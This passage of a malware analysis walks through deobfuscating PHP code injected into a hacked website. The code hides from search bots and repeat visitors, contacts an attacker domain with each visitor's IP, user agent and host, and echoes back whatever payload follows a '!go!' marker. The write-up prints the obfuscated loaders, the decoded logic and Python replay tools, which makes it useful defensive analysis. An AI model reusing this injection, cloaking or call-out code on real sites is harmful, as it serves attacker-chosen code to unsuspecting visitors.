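          'QGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9"));')


def deobfuscate_stage2():
    """Returns (wrapper name, stage-2 code with all base64 literals inlined)."""
    helper = unreverse_eval_line(REVERSED_LINE)   # defines the base64 wrapper
    wrapper = find_b64_wrapper(helper)
    if wrapper is None:
        raise ValueError('no base64 wrapper found in the first decoded line')
    return wrapper, peel_literals(STAGE2, wrapper)


if __name__ == '__main__':
    name, clean = deobfuscate_stage2()
    print(name)
    print(clean)
```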
Now let's go through the formatted version.
$evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM=");
base64-decoding this gives "stats".
$evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA==");
Decoding gives "http".
$evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4=");
Decoding gives "in".
$evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ==");
Decoding gives "!go!".
$evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")];
Decoding gives "HTTP_USER_AGENT". In other words,
$evalrMsivpMgcfC = $_SERVER["HTTP_USER_AGENT"];
is what this line is.
eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr)));
Array element [0], which I took for a decoy earlier, reappears here. It goes through strrev, so reversing it and base64-decoding gives
$fri55 = ';$retarn($fif25,$fif52,$fit52';$fr55 = '$retrun(';$fr52 = 'MKU}f6T4';$fri52 = '\x3d\42\x29\51\x3b';$fri25 = '\112\x48\112\x6c\144\x48'; $fr25 = $fri52.'")'.$fri55; $dri25 = "\x24\144\x64\60\x20\75\x20";eval('$fif25 = "\x40\50\x2e\53\x29\100\x69\145";$fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b";$fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22";preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163'.$fr25.'."'.$fri25.'\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75'.$fr25.'."'.$fri25.'\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163'.$fr25.'."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37'.$fri25.'\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75'.$fri52.'");$psi1='.$fr55.'"'.$fr52.'PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMo
gKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").'.$fr55."'".''.$fr52.'LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@'."'".').'.$fr55."'".$fr52.'PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:'."'".').'.$fr55."'".$fr52.'PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@'."'".');'.$dri25.'$retun("",$psi1.'.$fr55.'"fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").'.$fr55.'"OpQyeVL:"));');
This code appears. Formatting it gives
$fri55 = ';$retarn($fif25,$fif52,$fit52'; $fr55 = '$retrun('; $fr52 = 'MKU}f6T4'; $fri52 = '\x3d\42\x29\51\x3b'; $fri25 = '\112\x48\112\x6c\144\x48'; $fr25 = $fri52.'")'.$fri55; $dri25 = "\x24\144\x64\60\x20\75\x20"; eval('$fif25 = "\x40\50\x2e\53\x29\100\x69\145"; $fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b"; $fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22"; preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163'.$fr25.'."'.$fri25.'\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75'.$fr25.'."'.$fri25.'\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163'.$fr25.'."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37'.$fri25.'\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75'.$fri52.'"); 
$psi1='.$fr55.'"'.$fr52.'PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").'.$fr55."'".''.$fr52.'LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@'."'".').'.$fr55."'".$fr52.'PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:'."'".').'.$fr55."'".$fr52.'PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@'."'".');'.$dri25.'$retun("",$psi1.'.$fr55.'"fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").'.$fr55.'"OpQyeVL:"));');
This is the code we get, and executing it yields
$dd0 = $fif25 = "\x40\50\x2e\53\x29\100\x69\145"; $fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b"; $fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22"; preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x48\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x48\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37\112\x48\112\x6c\144\x48\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75\x3d\42\x29\51\x3b"); 
$psi1=$retrun("MKU}f6T4PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").$retrun('MKU}f6T4LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@').$retrun('MKU}f6T4PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:').$retrun('MKU}f6T4PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@');$dd0 = $retun("",$psi1.$retrun("fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").$retrun("OpQyeVL:"));
This is what comes out. $dd0 as a whole is code yet again.
The contents of $psi1 are
$tsst52 = create_function('$return','return "web-".substr($return,0,3);');$tsst5 = create_function('$return','return md5($return);');$tsst51 = create_function('','return mt_rand(1-1,1+1);');$tsst512 = create_function('$create_function','return gethostbyname($create_function.".c"."a");');
This code comes back.
This section creates anonymous functions.
From this,
$dd0() = "f528764d624db129b32c21fbca0cb8d6.com";
is what we learn.
Formatted, this is
$tsst52 = create_function('$return','return "web-".substr($return,0,3);'); $tsst5 = create_function('$return','return md5($return);'); $tsst51 = create_function('','return mt_rand(1-1,1+1);'); $tsst512 = create_function('$create_function','return gethostbyname($create_function.".c"."a");');
This is the result.
$evalTtDntGsohDPt = array( evalMNhPOlTagIOfBSF("R29vZ2xl"), evalMNhPOlTagIOfBSF("U2x1cnA="), evalMNhPOlTagIOfBSF("TVNOQm90"), evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="), evalMNhPOlTagIOfBSF("WWFuZGV4"), evalMNhPOlTagIOfBSF("UmFtYmxlcg==") );
Analyzing this array,
array( 'Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler' );
this array emerges. As you can see, it's a list of search-engine bots.
At this point we can infer that the attack code is not returned when the user agent is a search bot.
eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9"));
Converting this gives
eval('function evalWEMBIkqYOIIGcLBn($s) {return @file_get_contents($s);}');
so it fetches a file from somewhere with file_get_contents.
$evalgKgHOXrDzX = $dd0(); // $dd0() holds the obfuscated domain name of the attacker's server.
if( (preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) { // Do nothing if the user agent is a search bot, or if the user already has a cookie named "stats".
} else { // In every other case this branch runs.
@setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800); // Set a cookie named "stats".
$evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")]));
Working this out, it resolves to http://f528764d624db129b32c21fbca0cb8d6.com/in.php?i=&b=&h= (with i= the visitor's REMOTE_ADDR, b= the URL-encoded User-Agent and h= the URL-encoded HTTP_HOST).
Accessing it from a browser, it becomes
http://f528764d624db129b32c21fbca0cb8d6.com/in.php?i=210.224.***.***&b=Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_7_2%29+AppleWebKit%2F535.7+%28KHTML%2C+like+Gecko%29+Chrome%2F16.0.912.75+Safari%2F535.7&h=isidai.sakura.ne.jp (I masked the IP address.)
This is what gets passed to file_get_contents.
if ( strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){ // strstr(,'!go!')
Presumably, the attack runs when the attacker's server returns a response containing !go!.
$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];
The code following !go! in the response from the attacker's server is assigned here.
echo $evalsssgqulVBTkZLAch;
The attack code assigned above is output to the browser, and the attack is carried out.
} }
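As an added example (not from the original post), here is a Python replay of the gate and callback logic just decoded, using the bot list, cookie name, marker and domain recovered above; the three requests and the server reply are constructed. It shows why a scan that identifies as a search bot, or a second visit within three hours that carries the "stats" cookie, is served a clean page.

```python
import re
from urllib.parse import quote_plus

# Values recovered from the decoded second stage above.
BOT_NAMES = ['Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler']
COOKIE_NAME = 'stats'     # set with a 10800 s (3 h) lifetime once a visitor has been served
MARKER = '!go!'           # the fetched reply is only used if it contains this
C2_HOST = 'f528764d624db129b32c21fbca0cb8d6.com'   # the value the post derives for $dd0()

# preg_match("/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i", $_SERVER["HTTP_USER_AGENT"])
_BOT_RE = re.compile('|'.join(map(re.escape, BOT_NAMES)), re.IGNORECASE)


def is_gated(user_agent, cookies):
    """True when the injected code takes the empty branch and serves the page unchanged."""
    return bool(_BOT_RE.search(user_agent or '')) or COOKIE_NAME in cookies


def callback_url(remote_addr, user_agent, http_host):
    """The URL handed to file_get_contents(): http://<c2>/in.php?i=<ip>&b=<ua>&h=<host>."""
    return 'http://%s/in.php?i=%s&b=%s&h=%s' % (
        C2_HOST, remote_addr, quote_plus(user_agent), quote_plus(http_host))  # PHP urlencode()


def injected_output(reply):
    """What the page echoes: explode('!go!', reply)[1], or nothing if the marker is absent."""
    if MARKER not in reply:           # strstr() check
        return ''
    return reply.split(MARKER)[1]


def simulate(request, reply):
    """Replay the decision for one request; `request` mirrors the $_SERVER/$_COOKIE fields."""
    if is_gated(request['user_agent'], request.get('cookies', {})):
        return {'fetched': None, 'echo': ''}
    url = callback_url(request['remote_addr'], request['user_agent'], request['http_host'])
    return {'fetched': url, 'echo': injected_output(reply)}


# Constructed requests: a crawler, a visitor who already has the cookie, and a fresh visit.
BROWSER_UA = 'Mozilla/5.0 (X11; Linux x86_64) Firefox/10.0'
CRAWLER = {'user_agent': 'Mozilla/5.0 (compatible; Googlebot/2.1)',
           'remote_addr': '192.0.2.10', 'http_host': 'victim.example'}
RETURNING = {'user_agent': BROWSER_UA, 'remote_addr': '192.0.2.11',
             'http_host': 'victim.example', 'cookies': {'stats': 'placeholder-md5'}}
FRESH = {'user_agent': BROWSER_UA, 'remote_addr': '192.0.2.11', 'http_host': 'victim.example'}
REPLY = 'ok!go!<!-- constructed stand-in for the injected markup -->'

if __name__ == '__main__':
    for name, req in (('crawler', CRAWLER), ('returning', RETURNING), ('fresh', FRESH)):
        print(name, simulate(req, REPLY))
```

When verifying a cleanup, fetch the page with an ordinary browser User-Agent and an empty cookie jar, and check the web server's outbound traffic for requests to in.php?i=&b=&h= on that domain.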
So in the end, all this elaborately obfuscated code does is fetch attack code with file_get_contents and output it. It had search-bot evasion and the like, but fundamentally it's a simple attack.
Seriously exhausting OTL